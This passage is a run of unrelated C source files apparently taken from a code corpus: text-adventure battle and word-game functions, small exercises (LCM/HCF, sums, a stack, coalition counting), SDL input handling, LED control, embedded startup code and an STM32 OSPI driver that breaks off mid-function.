puts("The demons attack missed!"); dodge = 0; demA = 0; } } else if(demA == 0 && dem > 0) { puts("The Demon gets ready to attack!"); demA = 1; } if(dem <= 0) { puts("The demons eyes glow a deep red"); } } return 0; } int ang(int health,int* wepP,int wepr) // lightning { int att = 0; //Used for angel class charged attack int op; int build = 0; int dodge = 0; //determines if the angel attack is going to hit //Angel stats int ang = 300; int angR = 20; int angD = 40; int angA = 0; //determines the angel attack and charge phase //Intro to angel puts("Then the blackness of the shrine is explodes into light."); puts("An armored angel shoots down from the ceiling and lands infront of you"); puts("He holds his sword of light and prepares to attack you"); while(ang > 0) { if(health <= 0) { //When you die to the Angel puts("The Angel hits you with his sword and you explode in a ball of light!"); return 2; } printf("Your Health: %d\n",health); printf("Your Range: %d\n",wepr); printf("Angel Health: %d\n",ang); printf("Angel Distance: %d\n",angD); puts("1 - Attack!\n2 - Dodge Left\n3 - Dodge Right\n4 - Fall Back\n5 - Move Forward\n"); scanf("%d",&op); switch (op) { case 1: //Attack //Sword Attack if(wepr == 10) { //If you are too far away if(angD > 10) { puts("Too far away!"); break; } //If you are about to kill the knight if(ang < 21) { puts("You swing your sword striking the angel."); puts("Their body burst opens the in a ball of light."); puts("The shrine then swings back to normal."); puts("The Bonfire is then put out."); ang -= *wepP; break; } //normally hitting the knight else { puts("You quickly attack the angel!"); ang -= *wepP; dodge = 0; } } //Knife Attack else if(wepr == 5) { //If you are too close to the wizard if(angD > wepr) { puts("Too far away!"); break; } //Final strike if(ang < 6) { //Killing the demon with knife puts("You throw your knife at the angel piercing his chest."); puts("His chest explodes full of light!"); break; } else { puts("You stab with your knife!"); dodge = 0; if(build == 3) { ang -= (*wepP * 8); build = 0; } else { build++; ang -= *wepP; angD = 5; } } } //bow attack else if(wepr == 30) { //If you are too close to the angel if(angD < wepr) { puts("Too close!"); puts("The angel lifts you and throws you down"); health -= 15; angD += 5; break; } //Killing the angel if(ang < 11) { puts("You relase your last arrow and it pierces the angels armor."); puts("Light bleeds from your arrow as the angel falls to the floor"); ang -= *wepP; *wepP += 20; break; } //Normal attack else { puts("You quick lauch a swarm of arrows towards the Angel"); ang -= *wepP; dodge = 0; } } //staff attack else if(wepr == 50) { if(angD < wepr) { puts("Too close!"); puts("The angel lifts you and throws you down"); health -= 15; angD += 15; break; } //Casting phase if(att == 1) { //Killing the demon if(ang < 51) { //kill dialog puts("You call upon stream of fire."); puts("It flows from your staff and fires threw the angel!"); puts("The angel falls to the ground"); ang -= *wepP; } //Hitting the angel else { att = 0; puts("You hurl a fireball from your staff!"); ang -= *wepP; angD -= 10; dodge = 0; } } //Charging phase else { puts("You start speaking an ancient language and your staff starts to glow!"); att = 1; } } break; case 2: puts("You roll to the left!"); dodge = 1; break; case 3: puts("You roll to the right!"); dodge = 1; break; case 4: puts("You fall back!"); angD += 10; break; case 5: puts("You move closer!"); angD -= 5; break; default: if(dodge == 0) { //Miss puts(""); angA = 0; } else { //Hit puts(""); health -= 40; angA = 0; } } //End of switch statement if(angA == 1) { if(dodge == 0) { puts("The angel catches you with its sword"); health -= 20; angA = 0; } else if(dodge == 1) { puts("The angel strikes at you barely missing you"); dodge = 0; angA = 0; } } else if(angA == 0 && ang > 0) { puts("The Angel gets ready to attack!"); angA = 1; } if(ang <= 0) { puts("The angel slowly fades...."); } } return 0; } void dead(void) { puts("YOU DIED"); } int randomAscii(void) { int val; val = 65 + rand()%25; return val; } void fillSumArray(int* ptr, int size) { int val, i; for(i = 0; i < size; i++) { val = 1 + rand()%9; *ptr = val; ptr++; } } void printSumArray(int* ptr, int size) { int i; for(i = 0; i < size; i++) { printf("%d\t", *ptr); ptr++; } puts(""); } int sumRandomArray(int* ptr, int size) { int sum = 0; int i; for(i = 0; i < size; i++) { sum += *ptr; ptr++; } return sum; } void GameRules() { printf("You enter a room and you found a huge screens which surround the four walls of the room. The room was dark and cold. Suddenly, you start to hear noises. You looked at the screen and you saw bunch of crows coming out of the screen. You tried to open the door but it's locked and there's no way out. \n\n"); printf("-You hear a voice and it said- You will be presented with a word to be guessed also known as the secret word of the dashes\n"); printf("-Guess letters none at a time\n"); printf("-You will have 3 letter guess\n"); printf("-Each time a letter is guessed,\n if it is in the word it will be placed in the dash word\n"); printf("-The dash word will be presented each time\n"); printf("-After guessing 3 letters , you will have the opportunity to guess the word\n"); printf("If you don't guess it right then you will die \n"); } void LowerCaseWord(char word[]) { int length=strlen(word); int i; for(i=0;i<length;i++) word[i]=tolower(word[i]); } void PlayAgain(int *againPtr) { int val; printf("\nDo you wanna play again? You might be able to go back to life\n"); printf("Enter (0) to QUIT, Any other number to Continue:"); scanf("%d",&val); *againPtr=val; } void CreateSecretWord(char solution[],char secretword[]) { int length=strlen(solution); int i; for(i=0;i<length;i++) secretword[i]='-'; secretword[length]='\0'; } void GetTheLetterGuess(char letterGussed[],char *letterPtr,int *numPtr) { letterGussed[*numPtr]=tolower(*letterPtr); (*numPtr)=(*numPtr)+1; letterGussed[*numPtr]='\0'; } void ReplaceDash(char solution[],char secretword[],char letter) { int length=strlen(solution); int i,cnt=0; for(i=0;i<length;i++) { if(solution[i]==letter) { secretword[i]=letter; cnt++; } } if(cnt==0) printf("\nThe letter %c is NOT in the word !",letter); else printf("\nThis letter %c is in the word!\n",letter); printf("\n***************************************************************************************\n"); } void DidYouWin(char solution[],char guess[]) { if(strcmp(solution,guess)==0) printf("\nYou guessed the right word and won that round,congratulations !\n"); else printf("\nYou guessed the wrong word and lost that round! HAHAHAHAHAHA YOU'RE GONNA DIE.... Crows starts attacking you and you cry in pain\n"); } void PlayOneGame(char solution[],char secretword[]) { char letterGuessed[MAXGUESSES+1]; char letterPtr; int numPtr=0; char letter; char guess[WORDSIZE+1]; int i; letterGuessed[0]='\0'; for(i=0;i<MAXGUESSES;i++) { printf("\nHere are the letters guessed so far:%s",letterGuessed); printf("\n\n %s\n\n",secretword); printf("Enter a letter you think is in the word:"); fflush(stdin); scanf("%c",&letterPtr); letter=tolower(letterPtr); ReplaceDash(solution,secretword,letter); GetTheLetterGuess(letterGuessed,&letterPtr,&numPtr); } printf("________________________________________________________________________\n"); printf("\nYou have guessed 3 letters, now it is time to guess the word\n"); printf(" %s",secretword); printf("\nEnter your guess for the word:"); scanf("%s",guess); LowerCaseWord(guess); DidYouWin(solution,guess); } void wordScramble(int *gameScore) { FILE *reader; FILE *writer; char scrambled[10], unscrambled[10], guess[10]; if((reader = fopen("room14input.txt", "r")) == NULL) { puts("File not found"); } else { fscanf(reader, "%s%s", scrambled, unscrambled); while(!feof(reader)) { printf("1st Word: %s\n", scrambled); printf("Your guess?: "); scanf(" %s", guess); if(strcmp(guess, unscrambled) == 0) { puts("Correct!"); *gameScore += 25; fscanf(reader, "%s%s", scrambled, unscrambled); printf("2nd Word: %s\n", scrambled); printf("Your guess?: "); scanf(" %s", guess); if(strcmp(guess, unscrambled) == 0) { printf("Correct!\n"); *gameScore += 25; fscanf(reader, "%s%s", scrambled, unscrambled); printf("3rd Word: %s\n", scrambled); printf("Your guess?: "); scanf(" %s", guess); if(strcmp(guess, unscrambled) == 0) { *gameScore += 25; puts("you win and you see the extraction point ahead!"); break; } } else { puts("You lose, back to the island you go"); } } else { puts("You lose, back to the island you go"); } break; } } fclose(reader); } void fightSystem(int *hp, int *machetePower) { int bearHP = 100; int bearPower = 80; int choice; printf("bearHP: %d\nbearPower: %d\nmachetePower: %d\n", bearHP, bearPower, *machetePower); Menu: puts("Choose from the following options.\n"); puts("1. Attack\n2. Run Away"); scanf("%d", &choice); switch(choice) { case 1: printf("Machete Power: %d\n", *machetePower); puts("You've chosen to attack."); bearHP -= *machetePower; printf("Bear HP: %d\n", bearHP); printf("User HP: %d\n", *hp); if(bearHP <= 0) { puts("You actually killed the bear\n"); break; } if(*hp > 0) { puts("The bear attacks back!\n"); *hp -= bearPower; if(*hp > 0) { puts("You survived the attack"); printf("Your HP: %d\n", *hp); printf("Bear HP: %d\n", bearHP); goto Menu; } else { puts("Bear wins"); break; } break; } case 2: puts("Ruuuuuuuuun!"); break; default: break; } } void castaway(void) { char phrase1[20], phrase2[20], phrase3[20]; int i, x; double a, b, correct, guess; puts("This is your life now, we got nothing but time..."); puts("You have 3 chances to get this right! if you don't....nothing really happens"); for(i = 0; i < 3; i++) { puts("Enter 2 numbers: "); scanf(" %lf %lf", &a, &b); printf("a = %.2lf\nb = %.2lf\n", a, b); puts("Square the sum of those two numbers, add 3, then square that number, what do you get?"); correct = pow((pow(a,b)+3),2); puts("Your guess?: "); scanf(" %lf", &guess); if(correct == guess) { puts("correct!"); } else { puts("WRONG"); break; } } }
the_stack_data/91571.c
#include<stdio.h> int main() { int x,y; float cost = 0; scanf("%d %d",&x,&y); switch(x) { case 1 : cost = y * 4; break; case 2 : cost = y * 4.5; break; case 3 : cost = y * 5; break; case 4 : cost = y * 2; break; case 5 : cost = y * 1.5; break; } printf("Total: R$ %.2f\n",cost); }
the_stack_data/136882.c
/*------------------------------------------------------------------------- Include files: --------------------------------------------------------------------------*/ #include <stdio.h> #include <stdbool.h> /*========================================================================= Constants and definitions: ==========================================================================*/ #define N 5 #define MANDATES_THRESHOLD 60 #define EMPTY -1 bool scan_1d_arr(int arr[], int n); bool scan_2d_bool_arr(bool arr[][N], int nrows); bool scan_input(int mandates[], bool can_collaborate[][N]); int count_coalitions(int mandates[], bool can_collaborate[][N]); int coalitions_calc(int mandates[], bool can_collaborate[][N], int temp[N], int prev, int index); int is_coalition(int mandates[], int temp[], int start); void print_arr(int arr[], int start, int n); int check_sum_for_temp(int mandates[], bool can_collaborate[][N], int temp[], int start, int end); /*------------------------------------------------------------------------- This program receives an array mandates for parties and a two dimensional array containing information about which party is willing to cooperate with which. The program will print how many different combinations of parties that are able to form a coalition exist. -------------------------------------------------------------------------*/ int main() { int mandates[N] = {0}; bool can_collaborate[N][N] = {{0}}; if (!scan_input(mandates, can_collaborate)) { printf("Wrong input"); return 0; } int coalition_num = count_coalitions(mandates, can_collaborate); printf("Number of coalitions: %d\n", coalition_num); return 0; } bool scan_1d_arr(int arr[], int n) { for (int i = 0; i < n; i++) { if (scanf("%d", arr + i) != 1 || arr[i] < 0) { return false; } } return true; } bool scan_2d_bool_arr(bool arr[][N], int nrows) { int x = 0; for (int i = 0; i < nrows; i++) { for (int j = 0; j < N; j++) { if (scanf("%d", &x) != 1) { return false; } arr[i][j] = x; // convert to bool } } return true; } bool scan_input(int mandates[], bool can_collaborate[][N]) { printf("Enter mandates:\n"); if (!scan_1d_arr(mandates, N)) { return false; } printf("Enter possible collaborations:\n"); return scan_2d_bool_arr(can_collaborate, N); } int count_coalitions(int mandates[], bool can_collaborate[][N]) { int temp[N] = {0}; return coalitions_calc(mandates, can_collaborate, temp, 0, 0); } /* Function to check all of the different combinations of parties to form a coalition. temp is a temporary array to store the current sub combination of parties. index is the length of the temp array. prev is the party we are currently checking combinations for. The function will return the number of different coalition combinations. */ int coalitions_calc(int mandates[], bool can_collaborate[][N], int temp[N], int prev, int index) { int sum = 0; if (index == N) { if (is_coalition(mandates, temp, index - 1)) { return 1; } return 0; } for (int i = prev; i < N; i++) { // adding the i party to the temp array temp[index] = i; // Checking if the current temporary array has enough cooperating parties to form a coalition. sum += check_sum_for_temp(mandates, can_collaborate, temp, 0, index + 1); // calling another calculation with the i party in the array and a shorter sub arr sum += coalitions_calc(mandates, can_collaborate, temp, i + 1, index + 1); // Emptying the cell containing the party in order to exclude it from further calculations. temp[index] = EMPTY; } return sum; } /* Function to check if the current temp array contains enough mandates to form a coalition. */ int is_coalition(int mandates[], int temp[], int start) { int sum = 0; for (int i = start; i < N; i++) { if (temp[i] >= 0) { sum += mandates[i]; } } if (sum > MANDATES_THRESHOLD) { return 1; } return 0; } /* Function to check which of the parties in the current temp array will cooperate and then check if these parties have enough mandates to form a coalition. The function will return 1 if the parties have enough mandates to form a coalition and 0 otherwise. */ int check_sum_for_temp(int mandates[], bool can_collaborate[][N], int temp[], int start, int end) { int sum = 0; bool agree = true; // Going over each party and checking if it will collaborate with the other parties in the temp array. for (int i = start; i < end; i++) { for (int j = start; j < end; j++) { if (!can_collaborate[temp[i]][temp[j]]) { // The currently iterated party will not collaborate with one of the parties in the temp array so it will be excluded. agree = false; } } if (agree) { if (temp[i] != EMPTY) { sum += mandates[temp[i]]; } } } if (sum > MANDATES_THRESHOLD) { return 1; } return 0; } void print_arr(int arr[], int start, int n) { if (n == 0) return; printf("["); for (int i = start; i < n - 1; i++) { printf("%d, ", arr[i]); } printf("%d]\n", arr[n - 1]); }
the_stack_data/234518991.c
#include <stdlib.h> #include <stdio.h> #ifdef PC #ifdef EMSCRIPTEN #include <SDL2/SDL.h> #else #include <SDL/SDL.h> #endif #include "LMP3D/LMP3D.h" void LMP3D_Event_Update(LMP3D_Event *event) { SDL_Event sdlevent; unsigned int i; event->clikright = 0; event->clikleft = 0; event->exit = 0; for(i = 0;i < LMP3D_EVENT_MAX;i++) { if(event->key[i] == 1) event->key[i] = 2; else if(event->key[i] == 3) event->key[i] = 0; } while(SDL_PollEvent(&sdlevent) == 1) { switch(sdlevent.type) { case SDL_MOUSEMOTION : event->mousex = sdlevent.motion.x; event->mousey = sdlevent.motion.y; break; case SDL_QUIT: event->exit = 1; break; case SDL_MOUSEBUTTONDOWN: switch(sdlevent.button.button) { case SDL_BUTTON_RIGHT: event->clikright = 1; break; case SDL_BUTTON_LEFT: event->clikleft = 1; break; } break; case SDL_MOUSEBUTTONUP: switch(sdlevent.button.button) { case SDL_BUTTON_RIGHT: event->clikright = 2; break; case SDL_BUTTON_LEFT: event->clikleft = 2; break; } break; case SDL_KEYDOWN: i = sdlevent.key.keysym.sym & 0xFFF; event->key[i] = 1; break; case SDL_KEYUP: i = sdlevent.key.keysym.sym & 0xFFF; event->key[i] = 3; break; /* case SDL_JOYBUTTONDOWN: for(i=0;i<20;i++) { if (sdlevent.jbutton.button == i) { event->touche[MNSJ + i] = 1; event->touche_ext[MNSJ + i] = 1; } } break; case SDL_JOYBUTTONUP: for(i=0;i<20;i++) { if (sdlevent.jbutton.button == i) { event->touche[MNSJ + i] = 2; event->touche_ext[MNSJ + i] = 0; } } break; case SDL_JOYAXISMOTION: if (sdlevent.jaxis.axis == 0 && sdlevent.jaxis.value < -20000) { event->touche[MNSJ_LEFT] = 1; event->touche_ext[MNSJ_LEFT] = 1; } if (sdlevent.jaxis.axis == 0 && sdlevent.jaxis.value >= -20000) { event->touche[MNSJ_LEFT] = 2; event->touche_ext[MNSJ_LEFT] = 0; } if (sdlevent.jaxis.axis == 0 && sdlevent.jaxis.value > 20000) { event->touche[MNSJ_RIGHT] = 1; event->touche_ext[MNSJ_RIGHT] = 1; } if (sdlevent.jaxis.axis == 0 && sdlevent.jaxis.value <= 20000) { event->touche[MNSJ_RIGHT] = 2; event->touche_ext[MNSJ_RIGHT] = 0; } if (sdlevent.jaxis.axis == 1 && sdlevent.jaxis.value < -20000) { event->touche[MNSJ_UP] = 1; event->touche_ext[MNSJ_UP] = 1; } if (sdlevent.jaxis.axis == 1 && sdlevent.jaxis.value >= -20000) { event->touche[MNSJ_UP] = 2; event->touche_ext[MNSJ_UP] = 0; } if (sdlevent.jaxis.axis == 1 && sdlevent.jaxis.value > 20000) { event->touche[MNSJ_DOWN] = 1; event->touche_ext[MNSJ_DOWN] = 1; } if (sdlevent.jaxis.axis == 1 && sdlevent.jaxis.value <= 20000) { event->touche[MNSJ_DOWN] = 2; event->touche_ext[MNSJ_DOWN] = 0; } */ break; default: break; } } event->key[Button_Start] = event->key['h']; event->key[Button_Select] = event->key['j']; event->key[Button_A] = event->key['s']; event->key[Button_B] = event->key['d']; event->key[Button_X] = event->key['f']; event->key[Button_Y] = event->key['g']; event->key[Button_Up] = event->key[(SDLK_UP & 0xFFF)]; event->key[Button_Down] = event->key[(SDLK_DOWN& 0xFFF)]; event->key[Button_Right] = event->key[(SDLK_RIGHT& 0xFFF)]; event->key[Button_Left] = event->key[(SDLK_LEFT& 0xFFF)]; event->key[Button_L1] = event->key['x']; event->key[Button_R1] = event->key['c']; event->key[Button_L2] = event->key['v']; event->key[Button_R2] = event->key['b']; event->key[Button_L3] = event->key['e']; event->key[Button_R3] = event->key['r']; } #endif
the_stack_data/11076430.c
//=====================================================================// /*! @file @brief RX 起動前、初期化 @author 平松邦仁 ([email protected]) @copyright Copyright (C) 2013, 2018 Kunihito Hiramatsu @n Released under the MIT license @n https://github.com/hirakuni45/RX/blob/master/LICENSE */ //=====================================================================// int main(int argc, char**argv); extern void rx_run_fini_array(void); extern void rx_run_preinit_array(void); extern void rx_run_init_array(void); extern void init_interrupt(void); void init(void) { // setup interrupt vector init_interrupt(); // C++ static constractor rx_run_preinit_array(); rx_run_init_array(); rx_run_fini_array(); // main の起動 static int argc = 0; static char **argv = 0; int ret = main(argc, argv); // メイン関数の「return」 while(1) ; }
the_stack_data/1119493.c
#include<stdio.h> int HCF(int,int); int LCM(int,int); void main() { int m,n,c,ans; printf("Enter any 2 numbers \n"); scanf("%d %d",&m,&n); printf("Press 1 for LCM and press 2 for HCF \n"); scanf("%d",&c); switch(c) { case 1: ans=LCM(m,n); printf("LCM is: %d \n",ans); break; case 2: ans=HCF(m,n); printf("HCF is: %d \n",ans); break; } } int HCF(int m,int n) { if(m==n) return n; else if(m<n) HCF(m,n-m); else HCF(m-n,n); } int LCM(int m,int n) { if(m==n) return m; else if(m<n) LCM(m+m,n); else LCM(m,n+n); }
the_stack_data/668049.c
/*Exercise 3 - Repetition Write a C program to calculate the sum of the numbers from 1 to n. Where n is a keyboard input. e.g. n -> 100 sum = 1+2+3+....+ 99+100 = 5050 n -> 1- sum = 1+2+3+...+10 = 55 */ #include <stdio.h> int main() { int number, total = 0; printf("Enter number : "); scanf("%d", &number); for(int i = 1; i <= number; i++){ total += i; } printf("Total : %d", total); return 0; }
the_stack_data/7950882.c
#include <stdio.h> #include <stdlib.h> struct Data { int data; }; typedef struct Data Data; struct stack { Data *dataList; Data *top; Data *bottom; int limit; }; typedef struct stack stack; void reset(stack *stack){ stack->bottom = NULL; stack->top = NULL; stack->dataList = NULL; stack->limit = 0; } void clear(stack *stack){ free(stack->dataList); reset(stack); } int empty(stack *stack){ if(stack->top == NULL){ return 1; } return 0; } int full(stack *stack){ Data *data; stack->limit++; if((stack->dataList = realloc(stack->dataList, sizeof(Data) * stack->limit)) == NULL){ printf("Não foi possível alocar memória"); stack->limit--; return 1; } return 0; } void push(stack *stack, Data *includeData){ if(full(stack) == 0){ stack->dataList[stack->limit - 1] = *includeData; stack->top = &stack->dataList[stack->limit - 1]; stack->bottom = stack->dataList; return; } return; } void list(stack *stack){ int cont = 0; for(; cont < stack->limit; cont++){ printf("\nData[%d] = %d", cont + 1, stack->dataList[cont]); } } void pop(stack *stack, Data *popData){ if(empty(stack) == 1) popData->data = NULL; return; popData = stack->top; stack->limit--; if(stack->limit <= 0){ free(stack->dataList); reset(stack); return; } stack->top = &stack->dataList[stack->limit - 1]; stack->bottom = stack->dataList; stack->dataList = realloc(stack->dataList, sizeof(Data) * stack->limit); return; } stack *initialize(){ stack *stack; reset(stack); stack->dataList = malloc(sizeof(Data) * stack->limit); return stack; } int menu() { int chosen = 0; do { printf("-- MENU:\n"); printf("\t 1. Inserir na pilha\n"); printf("\t 2. Excluir ultimo valor da pilha\n"); printf("\t 3. Listar elementos da pilha\n"); printf("\t 4. Limpa a pilha\n"); printf("\t 5. Sair\n"); printf("-- Digite sua escolha: "); scanf("%d", &chosen); } while (chosen < 1 || chosen > 5); getchar(); return chosen; } int main(){ stack *stack = initialize(); int chosen = 0; Data *dataToManipulate = malloc(sizeof(Data)); while (1) { chosen = menu(); switch (chosen) { case 1: printf("Adicionar qual valor? "); scanf("%d", &dataToManipulate->data); push(stack, dataToManipulate); break; case 2: pop(stack, dataToManipulate); if(dataToManipulate->data != NULL){ printf("Valor removido: %d \n", dataToManipulate->data); }else{ printf("Lista vazia"); } break; case 3: list(stack); break; case 4: clear(stack); break; case 5: clear(stack); exit(0); break; } } return 0; }
the_stack_data/140004.c
#include <string.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <linux/errno.h> int main(){ int a = 1; int file = open("/dev/usb/blinkstick0",O_WRONLY | O_APPEND); const void *luz1 = "0:0x1D334A,1:0x1D334A,2:0x1D334A,3:0x1D334A,4:0xCC0605,5:0xCC0605,6:0xCC0605,7:0xCC0605"; const void *luz1b = "0:0x1D334A,1:0x1D334A,2:0x1D334A,3:0x1D334A"; const void *luz2 = "0:0xCC0605,1:0xCC0605,2:0xCC0605,3:0xCC0605,4:0x1D334A,5:0x1D334A,6:0x1D334A,7:0x1D334A"; const void *luz2b = "4:0xCC0605,5:0xCC0605,6:0xCC0605,7:0xCC0605"; const void *luz3 = "0:0xD6AE01"; const void *luz4 = "0:0xD6AE01,1:0xD6AE01"; const void *luz5 = "0:0xD6AE01,1:0xD6AE01,2:0xD6AE01"; const void *luz6 = "0:0xD6AE01,1:0xD6AE01,2:0xD6AE01,3:0xD6AE01"; const void *luz7 = "0:0xD6AE01,1:0xD6AE01,2:0xD6AE01,3:0xD6AE01,4:0xD6AE01"; const void *luz8 = "0:0xD6AE01,1:0xD6AE01,2:0xD6AE01,3:0xD6AE01,4:0xD6AE01,5:0xD6AE01"; const void *luz9 = "0:0xD6AE01,1:0xD6AE01,2:0xD6AE01,3:0xD6AE01,4:0xD6AE01,5:0xD6AE01,6:0xD6AE01"; const void *luz10 = "0:0xD6AE01,1:0xD6AE01,2:0xD6AE01,3:0xD6AE01,4:0xD6AE01,5:0xD6AE01,6:0xD6AE01,7:0xD6AE01"; if(file < 0){ printf("No se pudo leer"); return -1; } while(a!=0){ int b = 0; while(b<=1){ write(file,luz1,87); usleep(195000); write(file,luz2,87); usleep(195000); write(file,luz1,87); usleep(195000); write(file,luz2,87); usleep(195000); write(file,luz1,87); usleep(195000); write(file,luz2,87); usleep(195000); b++; } b=0; while(b<=2){ write(file,luz1b,43); usleep(195000); write(file,"",0); usleep(125000); write(file,luz1b,43); usleep(125000); write(file,luz2b,43); usleep(125000); write(file,"",0); usleep(125000); write(file,luz2b,43); usleep(125000); b++; } write(file,luz3,10); usleep(100000); write(file,luz4,21); usleep(100000); write(file,luz5,32); usleep(100000); write(file,luz6,43); usleep(100000); write(file,luz7,54); usleep(100000); write(file,luz8,65); usleep(100000); write(file,luz9,76); usleep(100000); write(file,luz10,87); usleep(100000); } return 0; }
the_stack_data/935967.c
/* * Copyright (c) 2016, 2018, Oracle and/or its affiliates. * * All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, are * permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this list of * conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, this list of * conditions and the following disclaimer in the documentation and/or other materials provided * with the distribution. * * 3. Neither the name of the copyright holder nor the names of its contributors may be used to * endorse or promote products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE * GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. */ int main() { unsigned int arg = 0x1234; unsigned int out = 0; __asm__("xchgb %%al, %%ah" : "=a"(out) : "a"(arg)); return (out == 0x3412); }
the_stack_data/978930.c
#include<stdio.h> int main(){ printf("hello, world!"); }
the_stack_data/37637275.c
#include <pthread.h> #include <assert.h> int *v; int g; void *thread1(void * arg) { v = &g; } void *thread2(void *arg) { assert(v == &g); *v = 1; } int main() { pthread_t t1, t2; pthread_create(&t1, 0, thread1, 0); pthread_join(t1, 0); pthread_create(&t2, 0, thread2, 0); pthread_join(t2, 0); assert(v == &g); assert(*v == 1); return 0; }
the_stack_data/11074963.c
/* ヘッダファイルのインクルード */ #include <stdio.h> /* 標準入出力 */ /* main関数の定義 */ int main(void){ /* C言語プログラムとしてはここからがスタート. */ /* 以下の処理を実行 */ printf("main_function\n"); /* printfで"main_function"と出力する. */ /* プログラムの終了 */ return 0; /* システムに0を返す. */ }
the_stack_data/871945.c
#include <stdio.h> #include <string.h> #include <stdlib.h> int main(){ FILE *f=fopen("texto.txt","r"); char c[256]; if(f==NULL){ printf("Erro ao abrir o arquivo."); exit(1); } while(fgets(c,256,f)!='\0'){ printf("%s",c); } fclose(f); return 0; }
the_stack_data/182953710.c
/* * Copyright (c) 2020, Arm Limited and affiliates. * Copyright (c) 2020, STMicroelectronics. * SPDX-License-Identifier: Apache-2.0 * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #if DEVICE_OSPI #include "ospi_api.h" #include "mbed_error.h" #include "mbed_debug.h" #include "cmsis.h" #include "pinmap.h" #include "PeripheralPins.h" #include "mbed-trace/mbed_trace.h" #define TRACE_GROUP "STOS" // activate / de-activate debug #define ospi_api_c_debug 0 /* Max amount of flash size is 4Gbytes */ /* hence 2^(31+1), then FLASH_SIZE_DEFAULT = 1<<31 */ #define OSPI_FLASH_SIZE_DEFAULT 0x4000000 //512Mbits static uint32_t get_alt_bytes_size(const uint32_t num_bytes) { switch (num_bytes) { case 1: return HAL_OSPI_ALTERNATE_BYTES_8_BITS; case 2: return HAL_OSPI_ALTERNATE_BYTES_16_BITS; case 3: return HAL_OSPI_ALTERNATE_BYTES_24_BITS; case 4: return HAL_OSPI_ALTERNATE_BYTES_32_BITS; } error("Invalid alt bytes size"); return 0xFFFFFFFF; } ospi_status_t ospi_prepare_command(const ospi_command_t *command, OSPI_RegularCmdTypeDef *st_command) { debug_if(ospi_api_c_debug, "ospi_prepare_command In: instruction.value %x dummy_count %x address.bus_width %x address.disabled %x address.value %x address.size %x\n", command->instruction.value, command->dummy_count, command->address.bus_width, command->address.disabled, command->address.value, command->address.size); st_command->FlashId = HAL_OSPI_FLASH_ID_1; if (command->instruction.disabled == true) { st_command->InstructionMode = HAL_OSPI_INSTRUCTION_NONE; st_command->Instruction = 0; } else { st_command->Instruction = ((command->instruction.bus_width == OSPI_CFG_BUS_OCTA) || (command->instruction.bus_width == OSPI_CFG_BUS_OCTA_DTR)) ? command->instruction.value << 8 | (0xFF - command->instruction.value) : command->instruction.value; switch (command->instruction.bus_width) { case OSPI_CFG_BUS_SINGLE: st_command->InstructionMode = HAL_OSPI_INSTRUCTION_1_LINE; break; case OSPI_CFG_BUS_DUAL: st_command->InstructionMode = HAL_OSPI_INSTRUCTION_2_LINES; break; case OSPI_CFG_BUS_QUAD: st_command->InstructionMode = HAL_OSPI_INSTRUCTION_4_LINES; break; case OSPI_CFG_BUS_OCTA: case OSPI_CFG_BUS_OCTA_DTR: st_command->InstructionMode = HAL_OSPI_INSTRUCTION_8_LINES; break; default: error("Command param error: wrong instruction format\n"); return OSPI_STATUS_ERROR; } } st_command->InstructionSize = (st_command->InstructionMode == HAL_OSPI_INSTRUCTION_8_LINES) ? HAL_OSPI_INSTRUCTION_16_BITS : HAL_OSPI_INSTRUCTION_8_BITS; st_command->InstructionDtrMode = (command->instruction.bus_width == OSPI_CFG_BUS_OCTA_DTR) ? HAL_OSPI_INSTRUCTION_DTR_ENABLE : HAL_OSPI_INSTRUCTION_DTR_DISABLE; st_command->DummyCycles = command->dummy_count; // these are target specific settings, use default values st_command->SIOOMode = HAL_OSPI_SIOO_INST_EVERY_CMD; st_command->DataDtrMode = (command->instruction.bus_width == OSPI_CFG_BUS_OCTA_DTR) ? HAL_OSPI_DATA_DTR_ENABLE : HAL_OSPI_DATA_DTR_DISABLE; st_command->AddressDtrMode = (command->instruction.bus_width == OSPI_CFG_BUS_OCTA_DTR) ? HAL_OSPI_ADDRESS_DTR_ENABLE : HAL_OSPI_ADDRESS_DTR_DISABLE; st_command->AlternateBytesDtrMode = (command->instruction.bus_width == OSPI_CFG_BUS_OCTA_DTR) ? HAL_OSPI_ALTERNATE_BYTES_DTR_ENABLE : HAL_OSPI_ALTERNATE_BYTES_DTR_DISABLE; st_command->DQSMode = (command->instruction.bus_width == OSPI_CFG_BUS_OCTA_DTR) ? HAL_OSPI_DQS_ENABLE : HAL_OSPI_DQS_DISABLE; st_command->OperationType = HAL_OSPI_OPTYPE_COMMON_CFG; if (command->address.disabled == true) { st_command->AddressMode = HAL_OSPI_ADDRESS_NONE; st_command->AddressSize = 0; } else { st_command->Address = command->address.value; switch (command->address.bus_width) { case OSPI_CFG_BUS_SINGLE: st_command->AddressMode = HAL_OSPI_ADDRESS_1_LINE; break; case OSPI_CFG_BUS_DUAL: st_command->AddressMode = HAL_OSPI_ADDRESS_2_LINES; break; case OSPI_CFG_BUS_QUAD: st_command->AddressMode = 